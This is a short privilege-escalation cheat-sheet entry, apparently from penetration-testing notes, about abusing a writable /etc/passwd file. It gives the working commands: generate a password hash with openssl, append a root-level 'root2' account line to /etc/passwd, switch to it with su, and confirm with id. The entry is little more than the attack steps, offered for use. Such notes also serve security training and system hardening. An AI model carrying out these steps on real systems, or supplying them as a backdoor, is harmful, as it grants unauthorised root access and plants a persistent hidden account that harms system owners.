# Editable /etc/passwd

## Editable /etc/passwd

If /etc/passwd is editable then add a user with root access in it

* Generate password hash openssl passwd evil123
* echo "root2:\<passwd-hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
* su root2
* id